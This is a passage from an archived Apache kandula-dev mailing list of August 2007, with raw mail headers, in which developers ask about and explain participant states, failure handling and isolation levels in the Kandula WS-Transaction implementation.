h=received:message-id:date:from:to:subject:cc:mime-version:content-type; b=t+/ewHDVET8yezfEbOcCkWiYYwuYU00oHD8z7Mzffjw2a1ZLpGPHXLGPlQ2rdmYaF7taZDOmA8vETb9KKU0HlV8vv0zlNDmUO1Rj4TRm+PYsl1Eft9K5gXZl0Xoo1rECbaDGqEVv3wAnJI9FU99M/87IOxH3cVbiOIu13ZVWA88= Received: by 161.129.204.104 with SMTP id t8mr362000wfh.1186544113367; Tue, 07 Aug 2007 20:35:13 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Tue, 7 Aug 2007 20:35:12 -0700 (PDT) Message-ID: <[email protected]> Date: Wed, 8 Aug 2007 11:35:12 +0800 From: "=?GB2312?B?1vHOsMjE?=" <[email protected]> To: [email protected] Subject: Question about kandual BA States Cc: [email protected] MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_22906_26406247.1186544112818" X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_22906_26406247.1186544112818 Content-Type: text/plain; charset=GB2312 Content-Transfer-Encoding: base64 Content-Disposition: inline SGksQWxsOgogICAgICAgSSBtYWtlIGV2ZXJ5IHBhcnRpY2lwYW50IGluIFN0YXRlIEFjdGl2ZS5U aGVuICxJIGV4Y3V0ZQoiQkFQYXJ0aWNpcGFudFR5cGVbXSBwbGlzdCA9ICgoTWl4ZWRDb29yZGlu YXRvcklQcm94eSkKY29vcmRJUHJveHkpIC5jb21wbGV0ZVBhcnRpY2lwYW50cyhwYXJ0aWNpcGFu dHNUb09wZXJhdGVPbik7IiBJIGdldApwbGlzdFtpXS5nZXRSZXN1bHRTdGF0ZSgpLmdldFN0YXRl KCkgaXMgImFjdGl2ZSAiICBhbmQKcGxpc3RbaV0uZ2V0U3RhdHVzKCkuZ2V0U3RhdGUoKSBpcyAi Y29tcGxldGluZyIuQnV0LGluIGZhY3QsdGhlIHN0YXRlIG9mCmNvb3JkaW5hdGUgYW5kIHBhcnRp Y2lwYW50IGhhdmUgYmVlbiAiY29tcGxldGVkIihwYXJ0aWNpcGFudCB3aWxsIHNlbmQKImNvbXBs ZXRlZCIgbWVzc2FnZSBhdXRvbWF0aWNhbGx5KS5TbyBJIHRoaW5rIHRoZSAgUmVzdWx0U3RhdGUo KSBzaG91bGUgYmUKICJjb21wbGV0aW5nIiAgYW5kIFN0YXR1cyBzaG91bGQgYmUgImNvbXBsZXRl ZCIuSXQgc2VlbXMgdGhhdCB0aGUgcGxpc3RbaV0ncwpzdGF0ZSBzbG93ZXIgdGhhbiB0aGUgY29v cmRpbmF0ZSBhbmQgcGFydGljaXBhbnQgJyBjdXJyZW50IHN0YXRlLldoeSBkZXNpZ24KdGhpcyB3 YXk/IElmIEkgd2FudCB0byBnZXQgdGhlIGNvb3JkaW5hdGUgYW5kIHBhcnRpY2lwYW50ICdzIGN1 cnJlbnQKc3RhdGUsd2hhdCBJIG1lYW4gaXMgdGhlIHRydWUgY3VycmVudCBzdGF0ZS5XaGF0IHNo b3VsZCBJIGRvPwotLSAKICAgICAgICAgICAgICAgyMTW8c6wCrGxvqnTyrXntPPRpyBQQ04mQ0FE 1tDQxAo= ------=_Part_22906_26406247.1186544112818 Content-Type: text/html; charset=GB2312 Content-Transfer-Encoding: base64 Content-Disposition: inline PGRpdj5IaSxBbGw6PC9kaXY+CjxkaXY+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i c3A7IEkgbWFrZSBldmVyeSBwYXJ0aWNpcGFudCBpbiBTdGF0ZSBBY3RpdmUuVGhlbiAsSSBleGN1 dGUgJnF1b3Q7QkFQYXJ0aWNpcGFudFR5cGVbXSBwbGlzdCA9ICgoTWl4ZWRDb29yZGluYXRvcklQ cm94eSkgY29vcmRJUHJveHkpJm5ic3A7LmNvbXBsZXRlUGFydGljaXBhbnRzKHBhcnRpY2lwYW50 c1RvT3BlcmF0ZU9uKTsmcXVvdDsgSSBnZXQgcGxpc3RbaV0uZ2V0UmVzdWx0U3RhdGUoKS5nZXRT dGF0ZSgpIGlzICZxdW90O2FjdGl2ZSAmcXVvdDsmbmJzcDsgYW5kIHBsaXN0W2ldLmdldFN0YXR1 cygpLmdldFN0YXRlKCkgaXMgJnF1b3Q7Y29tcGxldGluZyZxdW90Oy5CdXQsaW4gZmFjdCx0aGUg c3RhdGUgb2YgY29vcmRpbmF0ZSBhbmQgcGFydGljaXBhbnQgaGF2ZSBiZWVuICZxdW90O2NvbXBs ZXRlZCZxdW90OyhwYXJ0aWNpcGFudCB3aWxsIHNlbmQgJnF1b3Q7Y29tcGxldGVkJnF1b3Q7IG1l c3NhZ2UgYXV0b21hdGljYWxseSkuU28gSSB0aGluayB0aGUmbmJzcDsmbmJzcDtSZXN1bHRTdGF0 ZSgpJm5ic3A7c2hvdWxlIGJlICZuYnNwOyZxdW90O2NvbXBsZXRpbmcmcXVvdDsmbmJzcDsgYW5k IFN0YXR1cyBzaG91bGQgYmUgJnF1b3Q7Y29tcGxldGVkJnF1b3Q7Lkl0IHNlZW1zIHRoYXQgdGhl IHBsaXN0W2ldJiMzOTtzIHN0YXRlJm5ic3A7c2xvd2VyIHRoYW4gdGhlIGNvb3JkaW5hdGUgYW5k IHBhcnRpY2lwYW50ICYjMzk7IAo8Zm9udCBzdHlsZT0iQkFDS0dST1VORC1DT0xPUjogI2ZmMDAw MCI+Y3VycmVudCBzdGF0ZS48L2ZvbnQ+PGZvbnQgc3R5bGU9IkJBQ0tHUk9VTkQtQ09MT1I6ICNm ZmZmZmYiPldoeSBkZXNpZ24gdGhpcyB3YXk/IElmIEkgd2FudCB0byBnZXQgdGhlIGNvb3JkaW5h dGUgYW5kIHBhcnRpY2lwYW50ICYjMzk7cyBjdXJyZW50IHN0YXRlLHdoYXQmbmJzcDtJIG1lYW4g aXMgdGhlIHRydWUgY3VycmVudCAKc3RhdGUuV2hhdCBzaG91bGQgSSBkbz88YnI+PC9mb250Pi0t IDxicj4mbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJz cDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsgyMTW8c6wPGJyPrGxvqnTyrXntPPRpyBQ Q04mYW1wO0NBRNbQ0MQgPC9kaXY+Cg== ------=_Part_22906_26406247.1186544112818-- From [email protected] Wed Aug 08 08:08:08 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41815 invoked from network); 8 Aug 2007 08:08:07 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Aug 2007 08:08:07 -0000 Received: (qmail 44071 invoked by uid 500); 8 Aug 2007 08:08:06 -0000 Delivered-To: [email protected] Received: (qmail 43878 invoked by uid 500); 8 Aug 2007 08:08:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <kandula-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 43865 invoked by uid 99); 8 Aug 2007 08:08:05 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Aug 2007 01:08:05 -0700 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mx.inode.at) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Aug 2007 08:07:59 +0000 Received: from [161.129.204.104] (port=10303 helo=margarita.erven.at) by smartmx-09.inode.at with esmtps (TLS-1.0:DHE_RSA_AES_256_CBC_SHA:32) (Exim 4.50) id 1IIgZr-0002FW-NC for [email protected]; Wed, 08 Aug 2007 10:07:35 +0200 Received: from [161.129.204.104] (localhost [161.129.204.104]) by margarita.erven.at (Postfix) with ESMTP id C017E225A84 for <[email protected]>; Wed, 8 Aug 2007 10:07:30 +0200 (CEST) Message-ID: <[email protected]> Date: Wed, 08 Aug 2007 10:07:48 +0200 From: Hannes Erven <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20070728) MIME-Version: 1.0 To: [email protected] Subject: Re: Question about kandual BA States References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=GB2312 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org =D6=F1=CE=B0=C8=C4 wrote: > plist[i].getResultState().getState() is "active " and=20 > plist[i].getStatus().getState() is "completing". > But,in fact,the state of=20 > coordinate and participant have been "completed"(participant will send=20 > "completed" message automatically). The contents of the plist are *not* updated, but reflect the states at the point in time the plist was returned. In this case, this is immediately after the coordinator sent out the "Complete" messages to the participants. New messages from the participants do not change the contents of this plist instance anymore. But: you can at any time fetch an updated plist from the coordinator with plist =3D coordIProxy.listParticipants(); > So I think the ResultState() shoule=20 > be "completing" and Status should be "completed". The "ResultState" reflects what actually happened on a business level. Please see the javadoc on AbstractCoordParticipant#getResultState and the WS-BAI specification (linked at http://ws.apache.org/kandula/1/publications.html ) what this means. In short: this value is only important when the participant has already reached the Ended state (and .getStatus().getState() returns "Ended"). Without ResultState you would not be able to know whether the participant completed (=3D executed your work) or exited (=3D did nothing= ). > what I mean is the true current state. The true current state can only be fetched by obtaining a current participant list through coordIProxy.listParticipants() and examining the .getStatus().getState() return value of the desired participant. I hope I could explain this? -hannes --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Aug 16 10:16:38 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 4697 invoked from network); 16 Aug 2007 10:16:37 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Aug 2007 10:16:37 -0000 Received: (qmail 42293 invoked by uid 500); 16 Aug 2007 10:16:34 -0000 Delivered-To: [email protected] Received: (qmail 42257 invoked by uid 500); 16 Aug 2007 10:16:34 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <kandula-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 42246 invoked by uid 99); 16 Aug 2007 10:16:34 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Aug 2007 03:16:34 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO py-out-1112.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Aug 2007 10:16:30 +0000 Received: by py-out-1112.google.com with SMTP id a25so345715pyi for <[email protected]>; Thu, 16 Aug 2007 03:16:08 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type; b=PHxqF6W4u40luClDyRFvQpPs68vCTlJSJ4p/7vTHPpyo1XVw0XeKHGvYFWmSFnsxsM/P8rVM2NunBizCmOTsQz5lZdUPX/k46rBDbA21FxQBc7+Bkn4Q48z1OTtAD83aO/IxQhpzr8bgrhpaARmUMehrdJDoEA+rqBPGf3BcEkA= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:mime-version:content-type; b=d16NuKgQKP4QQOMljPYMlsOAZeqXi4FvaunE6fZOt6LESk2+irf4CnNCjSX2Wxe2L4hw6OTbvXJsBi0xw7jKV+lYMiOrlsgN9VMrJ+UOsuB4t2pa5AMzcedVXS/TdVChqnrEFg+2fflREtrvKREAyymNU7XGJA3IVb6hqVbuM7U= Received: by 161.129.204.104 with SMTP id s1mr1807132pyl.1187259367671; Thu, 16 Aug 2007 03:16:07 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Thu, 16 Aug 2007 03:16:07 -0700 (PDT) Message-ID: <[email protected]> Date: Thu, 16 Aug 2007 13:16:07 +0300 From: "Dobri Kitipov" <[email protected]> To: [email protected] Subject: Kandula2 failure use-cases MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_62996_18512668.1187259367630" X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_62996_18512668.1187259367630 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Hi everybody, I am interested about some failure use cases which can occur into a WS Transaction. If some has some information it will be appreciated The use cases: 1) What will happen if a WS goes down during the 2PC of the WS TX? What about if it has succeeded to vote prepared? If, for example, all WS have voted "prepared", finally commit will be invoked. How the WS that became unavailable in this specific moment will be treated? Will it receive the SOAP message to commit when it is again up and running? Or rollback will be invoked after the WS Transaction? 2) Another interesting scenario is when we have the Coordinator service down during a WS TX? What will happen then? Let's say we have 2 WS. The WS1 succeeded to commit but just before to invoke "Commit" to WS2 AtomicTransactionCoordinator fails. What will happen with the WS TX? I will make some tests when i find some time top do so and then will post the results. Thank you in advance guys! ------=_Part_62996_18512668.1187259367630 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Hi everybody,<br>I am interested about some failure use cases which can occur into a WS Transaction.<br>If some has some information it will be appreciated<br><br>The use cases:<br><br>1) What will happen if a WS goes down during the 2PC of the WS TX? What about if it has succeeded to vote prepared? <br>If, for example, all WS have voted &quot;prepared&quot;, finally commit will be invoked. How the WS that became unavailable in this specific moment will be treated? Will it receive the SOAP message to commit when it is again up and running? Or rollback will be invoked after the WS Transaction? <br><br><br>2) Another interesting scenario is when we have the Coordinator service down during a WS TX? What will happen then? <br>Let&#39;s say we have 2 WS. The WS1 succeeded to commit but just before to invoke &quot;Commit&quot; to WS2 AtomicTransactionCoordinator fails. What will happen with the WS TX? <br><br>I will make some tests when i find some time top do so and then will post the results.<br><br>Thank you in advance guys!<br> ------=_Part_62996_18512668.1187259367630-- From [email protected] Sat Aug 18 11:02:09 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 44198 invoked from network); 18 Aug 2007 11:02:08 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Aug 2007 11:02:08 -0000 Received: (qmail 69962 invoked by uid 500); 18 Aug 2007 11:02:05 -0000 Delivered-To: [email protected] Received: (qmail 69909 invoked by uid 500); 18 Aug 2007 11:02:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <kandula-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 69898 invoked by uid 99); 18 Aug 2007 11:02:05 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 18 Aug 2007 04:02:05 -0700 X-ASF-Spam-Status: No, hits=1.8 required=10.0 tests=DATE_IN_PAST_12_24,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail.gmx.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Sat, 18 Aug 2007 11:02:27 +0000 Received: (qmail invoked by alias); 18 Aug 2007 11:01:41 -0000 Received: from drms-590c7f8e.pool.einsundeins.de (EHLO [161.129.204.104]) [161.129.204.104] by mail.gmx.net (mp045) with SMTP; 18 Aug 2007 13:01:41 +0200 X-Authenticated: #9133598 X-Provags-ID: V01U2FsdGVkX19AFQ9MOMJAiRsZCTgb/aexecqukmDWsWlTA4oG34 IND/l/4oPbdow/ Message-ID: <[email protected]> Date: Fri, 17 Aug 2007 13:02:42 +0200 From: Benjamin Schmeling <[email protected]> User-Agent: Mozilla Thunderbird 1.0 (Windows/20041206) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Isolation levels in Kandula/ WS-AT Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Y-GMX-Trusted: 0 X-Virus-Checked: Checked by ClamAV on apache.org Hi all, I have a question concerning isolation levels preserved by Kandula. The WS-AT specification states nothing about isolation levels. It says that a transaction defined in WS-AT has ACID properties and consequently preserves isolation. Is it possible to choose a certain isolation level (1,2,4,8) in Kandula? Which level is supported by default? (Read uncommitted, read committed, repeatable read, serializable) Thanks, Benjamin --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sun Aug 19 09:06:19 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 55575 invoked from network); 19 Aug 2007 09:06:17 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Aug 2007 09:06:17 -0000 Received: (qmail 94426 invoked by uid 500); 19 Aug 2007 09:06:14 -0000 Delivered-To: [email protected] Received: (qmail 94388 invoked by uid 500); 19 Aug 2007 09:06:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <kandula-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 94377 invoked by uid 99); 19 Aug 2007 09:06:14 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 19 Aug 2007 02:06:14 -0700 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mx.inode.at) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 19 Aug 2007 09:06:12 +0000 Received: from [161.129.204.104] (port=14704 helo=margarita.erven.at) by smartmx-07.inode.at with esmtps (TLS-1.0:DHE_RSA_AES_256_CBC_SHA:32) (Exim 4.50) id 1IMgjF-0000pb-Rp; Sun, 19 Aug 2007 11:05:49 +0200 Received: from [161.129.204.104] (localhost [161.129.204.104]) by margarita.erven.at (Postfix) with ESMTP id AFB822FC8CD; Sun, 19 Aug 2007 11:05:44 +0200 (CEST) Message-ID: <[email protected]> Date: Sun, 19 Aug 2007 11:05:57 +0200 From: Hannes Erven <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20070728) MIME-Version: 1.0 To: [email protected] CC: Dobri Kitipov <[email protected]> Subject: Re: Kandula2 failure use-cases References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Hi Dobri, I'm not an Kandula 2 expert, but I feel your questions are not product specific but rather general WS-Transaction related, so I'll give it a shot. > 1) What will happen if a WS goes down during the 2PC of the WS TX? What > about if it has succeeded to vote prepared? A WS that reported "prepared" should already have the information about the transaction stored reliably, so that it may resume its participation once it comes up again. The coordinator of the atomic transaction will repeatedly try to transmit the final "commit" notification to this participant until it succeeds (or some configured timeout stops them). > Or rollback will be invoked after the WS Transaction? This is impossible - the coordinator notifies all participants at the same moment of the "commit". Even if some participants cannot be immediately reached, the coordinator cannot redecide since the participants that were reachable already have permanently committed and left the transaction. > 2) Another interesting scenario is when we have the Coordinator service > down during a WS TX? What will happen then? > Let's say we have 2 WS. The WS1 succeeded to commit but just before to > invoke "Commit" to WS2 AtomicTransactionCoordinator fails. What will > happen with the WS TX? Before sending out commit/rollback notifications the coordinator also will reliably store its transaction result. As soon it comes up again, it will resume its operation and notify the other participants. If it doesn't come up again, then yes, there is a problem: the transaction on WS2 will hang forever, and also the user doesn't get a confirmation back. > I will make some tests when i find some time top do so and then will > post the results. As far as I know neither Kandula_1 nor Kandula_2 reliably store transaction metadata away, so if they go down they forget about all running transactions. This is definitely something to improve ;-) -hannes --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sun Aug 19 09:21:54 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 57380 invoked from network); 19 Aug 2007 09:21:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Aug 2007 09:21:53 -0000 Received: (qmail 5630 invoked by uid 500); 19 Aug 2007 09:21:50 -0000 Delivered-To: [email protected] Received: (qmail 5596 invoked by uid 500); 19 Aug 2007 09:21:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <kandula-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 5585 invoked by uid 99); 19 Aug 2007 09:21:50 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 19 Aug 2007 02:21:50 -0700 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO mx.inode.at) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 19 Aug 2007 09:22:15 +0000 Received: from [161.129.204.104] (port=3902 helo=margarita.erven.at) by smartmx-08.inode.at with esmtps (TLS-1.0:DHE_RSA_AES_256_CBC_SHA:32) (Exim 4.50) id 1IMgyM-00046P-2b; Sun, 19 Aug 2007 11:21:26 +0200 Received: from [161.129.204.104] (localhost [161.129.204.104]) by margarita.erven.at (Postfix) with ESMTP id CD2BD33FE54; Sun, 19 Aug 2007 11:21:20 +0200 (CEST) Message-ID: <[email protected]> Date: Sun, 19 Aug 2007 11:21:33 +0200 From: Hannes Erven <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20070728) MIME-Version: 1.0 To: [email protected] CC: Benjamin Schmeling <[email protected]> Subject: Re: Isolation levels in Kandula/ WS-AT References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Hi Benjamin, > The WS-AT specification states nothing about isolation levels. It says > that a transaction defined in WS-AT has ACID properties and consequently > preserves isolation. Yes, exactly. I guess the specification authors did not want to be too specific to keep WS-AT open to different applications. Not every resource is a database ;-) > Is it possible to choose a certain isolation level (1,2,4,8) in Kandula? > Which level is supported by default? (Read uncommitted, read committed, > repeatable read, serializable) Since WS-AtomicTransaction does not allow transaction level requirements to be transmitted to the participants/resources, this is something the application has to take care of. Of course, it would also be possible to specify an extension to WS-AT that would allow setting the isolation level when creating the transaction context. -hannes --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sun Aug 19 16:16:30 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 63506 invoked from network); 19 Aug 2007 16:16:29 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Aug 2007 16:16:29 -0000 Received: (qmail 80343 invoked by uid 500); 19 Aug 2007 16:16:26 -0000 Delivered-To: [email protected] Received: (qmail 80313 invoked by uid 500); 19 Aug 2007 16:16:26 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <kandula-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 80302 invoked by uid 99); 19 Aug 2007 16:16:26 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 19 Aug 2007 09:16:26 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nz-out-0506.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 19 Aug 2007 16:16:26 +0000 Received: by nz-out-0506.google.com with SMTP id l1so321291nzf for <[email protected]>; Sun, 19 Aug 2007 09:16:05 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=U95nIN8hL1bIOKWdnw1GzBW0GOVoMNV3YzVHDZuDhqYC5wIc0PekGMqTivExDa5UmXxg8U6DzHW/9NYV7hyDdAOZyrnauvjkdHsDz5kpAKktKvzs4X+U88ZX3u1L1HAVskzBpPzcENbnyG8dbrwwpbpg7GIQr7do2rUAK8nU5U4= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=ArkO0LcBeX95o+wFGphhlTjx+/eFsYjvRi6JgfC9lhoxfZXDaf063ksDpQaeixcIs9+kiGM49mvjyRJ4EaIWehdzpMt2nwecNtPp7fNsJUVwXnhsbUfXFAoH8PZL2NKnCOwIs/Gs3mcVYCpBvwo2fxNBLFhoDOaH/6Vcizn1Hmo= Received: by 161.129.204.104 with SMTP id v8mr276280wfa.1187540164331; Sun, 19 Aug 2007 09:16:04 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Sun, 19 Aug 2007 09:16:04 -0700 (PDT) Message-ID: <[email protected]> Date: Mon, 20 Aug 2007 00:16:04 +0800 From: "=?GB2312?B?1vHOsMjE?=" <[email protected]> To: [email protected] Subject: Question aboot kandula BA In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_23045_183462.1187540164297" References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_23045_183462.1187540164297 Content-Type: text/plain; charset=GB2312 Content-Transfer-Encoding: base64 Content-Disposition: inline SGk6CiAgICBJIGhhdmEgcmVhZCBrYW5kdWxhIGNvZGUgYW5kIGxlYXJudCBpdCBtYW55IGRheXMu Tm93IEkgc3RpbGwgaGF2ZSBzb21lCnF1ZXNpb24gYWJvdXQgaXQgLgogICAgMS4gSWYgdGhlIGNv b3JkaW5hdGlvbiBwcm90b2NvbCB0eXBlIGlzICJQQyIuVGhlbixIb3cgY2FuIEkgY29udHJvbCB0 aGUKcGFydGljaXBhbnQgdG8gZG8gc29tZSBvcmRlcnM/KGUuZy4gc2VuZCBjb21wbGV0ZWQgbWVz c2FnZSkuRG8gSSBtdXN0IHdyaXRlCnRoZSAicGFydGljaXBhbnQudGVsbGNvbXBsZXRlZCAiIGNv ZGUgaW4gY2xhc3Mgd2hpY2ggaW1wbGVtZW50cwpCQXdQQ1BhcnRpY2lwYW50KCBlLmcuUmVudEFD YXJQYXJ0aWNpcGFudCk/SXMgdGhlcmUgYW55IG90aGVyCm1ldGhvZC5CZWNhdXNlSSB3YW50IHRv IHVzZSB0aGUgYnV0dG9uIG9uIHRoZSB3ZWIgdHJpZ2dlciB0aGUgc2VuZGluZwpvZiBtZXNzYWdl CiJjb21wbGV0ZWQiLk9yLCBpcyB0aGVyZSBzb21ldGhpbmcgbGlrZSAicHJveHkiIEFQSSB3aGlj aCBjYW4gaGVscCBtZQpjb250cm9sIHBhcnRpY2lwYW50J3Mgb3JkZXIuCiAgIDIuIEkgd2FudCBh c2sgc29tZXRoaW5nIGFib3V0IHlvdXIgaW1wbGVtZW50IG9mIEJBLkkgdGhpbmsgQkEgY2FuIGhl bHAKc292bGUgTG9uZ1RpbWUgQnVzc2luZXNzIGFjdGl2aXR5LlRoZW4gd2hlcmUgY2FuIEkgc2Vl IHRoZSBmdW5jdGlvbgpvZiAga2FuZHVsYSBzb2x2aW5nIHRoZSBMb25nVGltZSBxdXN0aW9uLkZv ciBleGFtcGxlLkZvciBleGFtcGxlLFBhcnRpY2lwYW50ClAxIHdpbGwgcnVuIDEwIGRheXMgaW4g b3JkZXIgdG8gZ2V0IHRoZSByZXN1bHQuV2hlbiBQMSBnZXQgdGhlIHJlc3VsdCAsaXQKd2lsbCBu b3RpZnkgUGFydGljaXBhbnQgUDIgdG8gZGUgb3RoZXIgdGFzay5EbyB0aGUgQ29vcmRpbmF0b3Ig Y2FuIGltcGxlbWVudAp0aGUgZnVuY3Rpb24tLWFmdGVyIFAxIGZpbmlzaCB0aGUgam9iLG5vZml0 eSBQMiB0byBkbyBqb2I/CiAgIDMuSSBhbHdheXMgY29uZnVzZSB0aGUgY29vcmRpbmF0b3IuQ2Fu IHlvdSB0ZWxsIG1lIHdoYXQgZG8gdGhlCmNvb3JkaW5hdG9yIGNvb3RkaW5hdGU/SWYgSSBkb24n dCB1c2luZyBjb29yZGluYXRvciBzcGVjaWZpY2F0aW9uLkp1c3QgbGV0CnRoZSBhcHBsaWNpdGlv biB0aGUgc3RhdGUuV2hhdCBpcyB0aGUgZGlmZmVyZW5jZSBkaXN0aW5ndWlzaCB1c2luZyBrYW5k dWxhCmltcGxlbWVudCBteSBhcHBsaWNhdGlvbi4KCiAgSSBrbm93IG1heWJlIHNvbWUgcXVlc3Rp 